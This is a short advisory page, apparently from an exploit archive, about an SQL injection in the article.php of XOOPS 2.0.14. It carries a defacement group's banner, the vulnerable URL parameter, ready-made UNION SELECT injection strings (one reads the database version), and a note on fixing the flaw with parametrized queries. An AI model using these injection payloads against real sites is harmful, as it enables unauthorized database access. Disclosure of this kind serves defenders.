XOOPS 2.0.14 remote SQL injection vulnerability in article.php

2010.09.01
Credit: []0iZy5
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################## ################################################################## # ___ ___ _ _____ __ _ # # / _ \ / _ \| | | __ \ / _| | | # # _ __| | | | | | | |_| | | | ___| |_ __ _ ___ ___ __| | # # | '__| | | | | | | __| | | |/ _ \ _/ _` |/ __/ _ \/ _` | # # | | | |_| | |_| | |_| |__| | __/ || (_| | (_| __/ (_| | # # |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| # # # # # # +-+-+-+-+ # # |C|r|e|w| # # +-+-+-+-+ # ################################################################## ################################################################## # [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability # # [#] Discovered By []0iZy5 # # [#] http://r00tDefaced.com & uNkn0wn.eu(is back) # # [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members# ################################################################## # # [2]-SQL injection # # Vulnerability Description: # SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed. # # Affected items: # http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection] # # Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query] # Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database. # # Fix the vulnerability: # To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered. # ################################################################# ################################################################# # r00tDefaced.com [28/08/2010]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top